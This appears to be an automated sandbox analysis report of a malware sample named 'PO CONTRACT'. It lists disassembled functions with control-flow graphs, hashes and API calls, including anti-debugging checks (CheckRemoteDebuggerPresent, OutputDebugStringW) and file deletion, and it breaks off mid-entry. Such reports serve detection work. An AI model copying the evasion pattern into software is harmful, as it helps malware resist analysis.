                                          control_flow_graph 5962 972869f-97286aa 5963 97286f2-97286f6 5962->5963 5964 97286ac-97286bd 5962->5964 5965 97286f7-9728722 5963->5965 5966 97286bf-97286f0 5963->5966 5964->5966 5968 9728724-9728727 5965->5968 5969 972872a-9728755 DeleteFileW 5965->5969 5966->5963 5968->5969 5970 9728757-972875d 5969->5970 5971 972875e-9728786 5969->5971 5970->5971
                                          APIs
                                          • DeleteFileW.KERNELBASE(00000000), ref: 09728748
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9720000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 47d0312696cc933282d7e4f5ecf8eef74e3aae33c801403dc36caac9da2be1b0
                                          • Instruction ID: d3fbf61755e7a57a648fdb005ef01e2aef0285f6ba0e8b3012ff27f658060080
                                          • Opcode Fuzzy Hash: 47d0312696cc933282d7e4f5ecf8eef74e3aae33c801403dc36caac9da2be1b0
                                          • Instruction Fuzzy Hash: 053180B2C097958FCB02CFA5C8547D9BFB0AF46310F1A819BD494EB392D3385905CBA2
                                          Function 0545304A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5974 545304a-54530f4 CheckRemoteDebuggerPresent 5976 54530f6-54530fc 5974->5976 5977 54530fd-5453138 5974->5977 5976->5977
                                          APIs
                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 054530E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: CheckDebuggerPresentRemote
                                          • String ID:
                                          • API String ID: 3662101638-0
                                          • Opcode ID: ffcb7112a893b4b110f12250bbc5e6f08901b69fcafa64e67f76e35f81164153
                                          • Instruction ID: c7e3a5866bac5eb3453fe51e3d3dab82a6aa2fc2d4b3fc8f40510cf8345c0b85
                                          • Opcode Fuzzy Hash: ffcb7112a893b4b110f12250bbc5e6f08901b69fcafa64e67f76e35f81164153
                                          • Instruction Fuzzy Hash: E93189718042598FCB10CFAAC884BEEBBF4AF49220F14845AE445B7351C7389945CF61
                                          Function 097286D8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5986 97286d8-9728722 5988 9728724-9728727 5986->5988 5989 972872a-9728755 DeleteFileW 5986->5989 5988->5989 5990 9728757-972875d 5989->5990 5991 972875e-9728786 5989->5991 5990->5991
                                          APIs
                                          • DeleteFileW.KERNELBASE(00000000), ref: 09728748
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9720000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 4f77eb0a24f099fcd4ae737f4047675bcccf89bf3693bb74c27c3489aaa80b43
                                          • Instruction ID: 744314156a2155788656ac5239876ba6c8e70a3e12c495f99d8340051311417d
                                          • Opcode Fuzzy Hash: 4f77eb0a24f099fcd4ae737f4047675bcccf89bf3693bb74c27c3489aaa80b43
                                          • Instruction Fuzzy Hash: F71113B6C006199BCB14CF9AC444BDEFBF4EB48320F14852AD818B7740D338A954CFA5
                                          Function 054531F0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5994 54531f0-5453242 5997 5453244-5453247 5994->5997 5998 545324a-5453275 OutputDebugStringW 5994->5998 5997->5998 5999 5453277-545327d 5998->5999 6000 545327e-5453292 5998->6000 5999->6000
                                          APIs
                                          • OutputDebugStringW.KERNELBASE(00000000), ref: 05453268
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: DebugOutputString
                                          • String ID:
                                          • API String ID: 1166629820-0
                                          • Opcode ID: 1a4df901d894eb9bd0d554f486ca87e62e8e65d2b82c6ac3e6c3bb7a4406136b
                                          • Instruction ID: bfab3f30ae1b246cc53871ec4c26377a9801dd744cf1d78fa66dae8aa676c02c
                                          • Opcode Fuzzy Hash: 1a4df901d894eb9bd0d554f486ca87e62e8e65d2b82c6ac3e6c3bb7a4406136b
                                          • Instruction Fuzzy Hash: 921122B5C006099BCB14CF9AD844ADEFBF4FB48324F20851AE818B3640C734A944CFA1
                                          Function 054531F8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6002 54531f8-5453242 6004 5453244-5453247 6002->6004 6005 545324a-5453275 OutputDebugStringW 6002->6005 6004->6005 6006 5453277-545327d 6005->6006 6007 545327e-5453292 6005->6007 6006->6007
                                          APIs
                                          • OutputDebugStringW.KERNELBASE(00000000), ref: 05453268
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: DebugOutputString
                                          • String ID:
                                          • API String ID: 1166629820-0
                                          • Opcode ID: b6c5f03f779e08ff9553ff15d471499b7c8823d61734adbfb0dcf14965d8b140
                                          • Instruction ID: 04c4b65eda79fb95b73f18e5c58e885d620fa07bcb58822188089083eff36486
                                          • Opcode Fuzzy Hash: b6c5f03f779e08ff9553ff15d471499b7c8823d61734adbfb0dcf14965d8b140
                                          • Instruction Fuzzy Hash: 551120B5C006099BCB18CF9AD884ADEFBF8FB48320F10851AE818B3740C734A944CFA5
                                          Function 08FF8036 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6009 8ff8036-8ff80a2 PostMessageW 6011 8ff80ab-8ff80bf 6009->6011 6012 8ff80a4-8ff80aa 6009->6012 6012->6011
                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 08FF8095
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015389486.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8ff0000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 3ed73c9fb6b2af525090948630741e836ed6cdd3c39af486f7b235d6ec55b8e1
                                          • Instruction ID: 801d0ad896b1d26e3d6976d20bbf304bbd4f8bac4fb0620af408cf2ba2c04105
                                          • Opcode Fuzzy Hash: 3ed73c9fb6b2af525090948630741e836ed6cdd3c39af486f7b235d6ec55b8e1
                                          • Instruction Fuzzy Hash: EF11F2B58002489FCB20CF9AC884BDEBBF8EB48314F20841AE518A3611C375A944CFA1
                                          Function 08FF8038 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6014 8ff8038-8ff80a2 PostMessageW 6015 8ff80ab-8ff80bf 6014->6015 6016 8ff80a4-8ff80aa 6014->6016 6016->6015
                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 08FF8095
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015389486.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8ff0000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 2f51adedfd0f0f94d7b8767e677833d00d7eaff23a0a406974728bf5bf0bb625
                                          • Instruction ID: f49f0805e27f9ae09da8953021caf1c9dc6bf42daa5db9a9814beb5987747733
                                          • Opcode Fuzzy Hash: 2f51adedfd0f0f94d7b8767e677833d00d7eaff23a0a406974728bf5bf0bb625
                                          • Instruction Fuzzy Hash: 9411D3B58002499FDB20CF9AC884BDEFBF8FB48314F20845AE558A7711C375A954CFA5
                                          Function 02D6F400 Relevance: .9, Instructions: 897COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 136ccc5e94e35b7539c34a6800989ed7ccc9a68bd28951fdb5235eaad96f335a
                                          • Instruction ID: f55cefa4f49394b80cd3a23f0f9d6685168c6001676f2b9cbf2272cb9a2dbb43
                                          • Opcode Fuzzy Hash: 136ccc5e94e35b7539c34a6800989ed7ccc9a68bd28951fdb5235eaad96f335a
                                          • Instruction Fuzzy Hash: B9724874A14615CFCB14DFB4E889AAEB7B2FF88304F518A29D90A97754CB34BC41CB50
                                          Function 08F5E250 Relevance: .6, Instructions: 594COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc80f19a5f0ab91190d4c977442cbabdf1098d7e8200418de8e6ef874050b664
                                          • Instruction ID: 33c5909a421c5a88a3336670a4418b916bf375b0d44f0751464f132b1a2b988b
                                          • Opcode Fuzzy Hash: cc80f19a5f0ab91190d4c977442cbabdf1098d7e8200418de8e6ef874050b664
                                          • Instruction Fuzzy Hash: E212D430A08305CFC705BBB8E89926E7FF2EF85200F4649AED585D7292DE385859C7D2
                                          Function 08F5D000 Relevance: .5, Instructions: 517COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 37087ecf095da61094644a7f1fe978d3af76c9e3f15a1ec008dcb08751d636cb
                                          • Instruction ID: d3fea04b2a30a3c403acfbf0d28c793abfd8d1d2ddbb6dcf6f01aa4ecfaa6a39
                                          • Opcode Fuzzy Hash: 37087ecf095da61094644a7f1fe978d3af76c9e3f15a1ec008dcb08751d636cb
                                          • Instruction Fuzzy Hash: E7E16D70A16218CFC708FBB9E98966D7BF1EB48200F5149B9E449E7350EE349C59C7A1
                                          Function 02D67640 Relevance: .5, Instructions: 516COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e60cbb5f7d125766dedd5acb74d52462ae5deac0e9a50f1cc409a32e230a915
                                          • Instruction ID: 305f10311a1a510404dd6c3f78c222f1e53829a94e8b5fb4394b744617ae04c4
                                          • Opcode Fuzzy Hash: 4e60cbb5f7d125766dedd5acb74d52462ae5deac0e9a50f1cc409a32e230a915
                                          • Instruction Fuzzy Hash: A4223F34A00219CFEB649BB4C858B7DB7B2FB84349F1084A9D44AAB395DB35DD85CF60
                                          Function 08F586E5 Relevance: .5, Instructions: 515COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cbf60a2b57b282669dbfbc033efa8e51a85df102af95fffee2eecad50ebd40e8
                                          • Instruction ID: 07eab6cb9d9e45511fe20a6fce335f37f4501b248e7e9a05b33063c630a6b6ef
                                          • Opcode Fuzzy Hash: cbf60a2b57b282669dbfbc033efa8e51a85df102af95fffee2eecad50ebd40e8
                                          • Instruction Fuzzy Hash: 8D02BE70A18315CFCB09BBB8E89926E7BF2FF49200F4149A9D485E7391DB389C19C791
                                          Function 08F587B3 Relevance: .5, Instructions: 452COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 252d37ca549856926f7884f810ae600b295cd38000afa17e19ecc5c158bddb59
                                          • Instruction ID: db6dc823aeca9fea79aed720ec5ee6f08f3b89543ff8bb14f3e457d575261cbb
                                          • Opcode Fuzzy Hash: 252d37ca549856926f7884f810ae600b295cd38000afa17e19ecc5c158bddb59
                                          • Instruction Fuzzy Hash: C4F16B70A24229CBCB48BBF9E88966E7BF2FF88200F414969D445E7354DF389C55C791
                                          Function 08F587C0 Relevance: .4, Instructions: 449COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87ffef086b932bbe6b7113fff61f3d4476904a1785c0c9fcce0c29dbd9619b07
                                          • Instruction ID: 0d79221578e61728f15c3729b40b37f5953119fd8e135e149e43fedfee690124
                                          • Opcode Fuzzy Hash: 87ffef086b932bbe6b7113fff61f3d4476904a1785c0c9fcce0c29dbd9619b07
                                          • Instruction Fuzzy Hash: 99F14A70A24229CBCB48BBF9E88966E7BF2FF88200F414968D545E7354DF389C55C791
                                          Function 08F59D68 Relevance: .4, Instructions: 440COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 368a2e1a1c129d6bf89bd007a37e42a833f276ee9407749f0a77a9215d249b71
                                          • Instruction ID: 9535dc72c0bdc7979e811582d7706fa09c5c276e4529e7c65dcff47740ed5107
                                          • Opcode Fuzzy Hash: 368a2e1a1c129d6bf89bd007a37e42a833f276ee9407749f0a77a9215d249b71
                                          • Instruction Fuzzy Hash: CAE18071619315CBC748BBB9E98D22E7BF1EF88600F814A6CE485D7354DE389C68C792
                                          Function 08F5A4F3 Relevance: .4, Instructions: 439COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 19ec872a16e184244178041a24a9d7710a26b0207bf4b9ff82218f76f1f77bb1
                                          • Instruction ID: 390eb4331e018cc3eb6fe6a12581094bae71e6f426ad041d459988c3e08c289c
                                          • Opcode Fuzzy Hash: 19ec872a16e184244178041a24a9d7710a26b0207bf4b9ff82218f76f1f77bb1
                                          • Instruction Fuzzy Hash: 59E17071A14229CBCB08BBF9E89966DBBF2FF84200F454A69E445E7350DF389C65C790
                                          Function 08F5D828 Relevance: .4, Instructions: 436COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f10024d5419b9618bdeb4ccf4a9f8df4fc77e8d340022e01ce3504999b4c9f91
                                          • Instruction ID: 3602cfb865a3ea6befe5101c5675dd5301df57f7c8d9bf9d945a59ab83e1cedd
                                          • Opcode Fuzzy Hash: f10024d5419b9618bdeb4ccf4a9f8df4fc77e8d340022e01ce3504999b4c9f91
                                          • Instruction Fuzzy Hash: 00025D74E18218CFCB48AFB8E84A69D7BB1FF88310F0049A9E955E3350DF745D958B91
                                          Function 08F5C9CB Relevance: .4, Instructions: 393COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0bf66c1d471e5f86967118d63baad535697e3f91ff27a6c21a4f81721e4ed49b
                                          • Instruction ID: 391116cda392e0250ad2458229e9f56c5ab982e3f6c5912c0b76b6c7472cc6cd
                                          • Opcode Fuzzy Hash: 0bf66c1d471e5f86967118d63baad535697e3f91ff27a6c21a4f81721e4ed49b
                                          • Instruction Fuzzy Hash: 19D19C70B14315CFCB48FBB9E99962E77F2EB88200F5149A8D44AE7394DE389C45C7A1
                                          Function 08F581D8 Relevance: .4, Instructions: 376COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82b5b75d28b6cd39799d7cf63ac23df3a408eb79528614c11d41a70c60b6fef4
                                          • Instruction ID: b713f34419a842daaec36f7f5b5a448548cf5928a0780fc386d528035ac9fb2a
                                          • Opcode Fuzzy Hash: 82b5b75d28b6cd39799d7cf63ac23df3a408eb79528614c11d41a70c60b6fef4
                                          • Instruction Fuzzy Hash: 93D18D70A24315CBC708BBB9E88A62E7BF2FB88640F414978D545E7354DE389C55CBD0
                                          Function 08F596FB Relevance: .3, Instructions: 338COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c0aff2e3af92a709999ac0a38dd1231d44d22ccb64ec7c5f03c7ba3855cb8a52
                                          • Instruction ID: f70b1903766a4000e489e9c17377e080fa19082e904611d625476b4be6abefa2
                                          • Opcode Fuzzy Hash: c0aff2e3af92a709999ac0a38dd1231d44d22ccb64ec7c5f03c7ba3855cb8a52
                                          • Instruction Fuzzy Hash: ECC18D70A14219CFCB08FBB9E99966D7BF2EF88200F5149A9D484E7350DF389D18C7A5
                                          Function 08F59718 Relevance: .3, Instructions: 323COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6cb423f146a87ec7cc46d3c0fad9c0f0c8961afc37d19366291e0ed0e65b6c8
                                          • Instruction ID: 03707f177c4874e17f4237ad09132a86a6130724117cee06a0bdde9f2cce65b2
                                          • Opcode Fuzzy Hash: d6cb423f146a87ec7cc46d3c0fad9c0f0c8961afc37d19366291e0ed0e65b6c8
                                          • Instruction Fuzzy Hash: 36B17D70A14219CBCB08FBB9E99966E7BF2EF88200F5149A8D444E7350DF389D18C7A5
                                          Function 08F596DC Relevance: .3, Instructions: 322COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2646101d47eb7c3598ae0a07374be027883398e6c9faf77fbb0932ef5fe7551d
                                          • Instruction ID: 00882b82f22eb19968b3d33aa99430f418bab3ed7f2d5cb4c02200bc56474141
                                          • Opcode Fuzzy Hash: 2646101d47eb7c3598ae0a07374be027883398e6c9faf77fbb0932ef5fe7551d
                                          • Instruction Fuzzy Hash: F0B19D70A14219CBCB08FBB9E99926D7BF2EF88200F5149A9D444E7350DF389D18C7A5
                                          Function 02D62CB0 Relevance: .3, Instructions: 289COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c2ed3852c1a948999853e6effea69cc867d514db4b4527e11c19e2581afc2236
                                          • Instruction ID: 6a7d7c9e014af28b97624abba163e2d4b849b67ebb1029bc9b0b982c779612df
                                          • Opcode Fuzzy Hash: c2ed3852c1a948999853e6effea69cc867d514db4b4527e11c19e2581afc2236
                                          • Instruction Fuzzy Hash: 30A1AB707002159FCB299FA4C89CBBE7BE6FF88705F148429E9069B3A5CB749C45CB91
                                          Function 02D62031 Relevance: .3, Instructions: 277COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 840e4d686e3e86d5b23271dd79d7120ffbda93ed6b8e5643594bc9a90418eced
                                          • Instruction ID: a788f7c7a9b4499f4b94a0b97f6283f2629f1d4da8173862a5b22397c3c87ac2
                                          • Opcode Fuzzy Hash: 840e4d686e3e86d5b23271dd79d7120ffbda93ed6b8e5643594bc9a90418eced
                                          • Instruction Fuzzy Hash: 3BC106BC213521DBD765BBB6F550B1A7B63F78C700F108724D94113BAC8A396839DE26
                                          Function 08F581D3 Relevance: .3, Instructions: 265COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4661d02e343bc57858f7c8145fdc65432bf064dd41bf8e92d5c706c84bf165d2
                                          • Instruction ID: 2787a67926212b72c343cc099a273150aac93cb9b6cb317ed12b38e20e7c6a9b
                                          • Opcode Fuzzy Hash: 4661d02e343bc57858f7c8145fdc65432bf064dd41bf8e92d5c706c84bf165d2
                                          • Instruction Fuzzy Hash: E3919D30B14315CBC708BBB9E98966E7BB2FB88201F414978E945E7394DF389C59CB90
                                          Function 08F5C5BC Relevance: .3, Instructions: 258COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1c7e215d48bbf3c06c35a397e7bbd5e52ac587cdbae0b6f976da25d97b56900
                                          • Instruction ID: 7be8aae25f5074e6f5c76c2266e1ed6e5b5d6041d122e69a42c14641b90d5e9c
                                          • Opcode Fuzzy Hash: b1c7e215d48bbf3c06c35a397e7bbd5e52ac587cdbae0b6f976da25d97b56900
                                          • Instruction Fuzzy Hash: 9981BD71A19315CFC708BBB9E89926EBBF2EF89200F4549A9D085D3351DF385819C3A6
                                          Function 02D6C488 Relevance: .3, Instructions: 251COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68e21f1ee663929a05e5100b10865d83fc6ab8cc0d653bdb3156bcd4b16681e9
                                          • Instruction ID: 950c026b7d9af2dd289250822bfaaa7f2b12800bd65df2fac252e0a889c66dc4
                                          • Opcode Fuzzy Hash: 68e21f1ee663929a05e5100b10865d83fc6ab8cc0d653bdb3156bcd4b16681e9
                                          • Instruction Fuzzy Hash: B241AB312142149FCB159F24DC4DBBE3BE2FB89305F04451AE88A9B3A0DB34DC41CBA1
                                          Function 02D6F4F2 Relevance: .2, Instructions: 239COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 777ec34b745f8b8d8972174dc893d4640887213b896422e22aee1c7c02b39934
                                          • Instruction ID: cfcfe051df552f6744ca1acc14b75c102e88c68016fcd786ad9817d95d2c34bc
                                          • Opcode Fuzzy Hash: 777ec34b745f8b8d8972174dc893d4640887213b896422e22aee1c7c02b39934
                                          • Instruction Fuzzy Hash: C5A10A74A14215CFCB14DFA8D889AAEB7F6FF88304F508629E50AA7754DB34AC41CF54
                                          Function 08F5C5E8 Relevance: .2, Instructions: 235COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2dad5563668ad37994d1750e05acd6a501cf482e973a3e1a24c8dd4bbd3a994
                                          • Instruction ID: 8bff6e6290c06a453a70f44dd57cd76abf83b2859e1cb3242c1c4a7942ed1349
                                          • Opcode Fuzzy Hash: d2dad5563668ad37994d1750e05acd6a501cf482e973a3e1a24c8dd4bbd3a994
                                          • Instruction Fuzzy Hash: DC718B70A15319CBC748BBB9E88962EBBF2EF88200F41896CD185D3344DF389859C3A5
                                          Function 08F5A543 Relevance: .2, Instructions: 231COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b45d1b1e5caaf6c8dbd501e58280a0edca39561a4f6ee706e810210efa072e4
                                          • Instruction ID: 103bed2abf8548c069859b4db755ffe05826639bf4294e3f3492923b66a31d96
                                          • Opcode Fuzzy Hash: 5b45d1b1e5caaf6c8dbd501e58280a0edca39561a4f6ee706e810210efa072e4
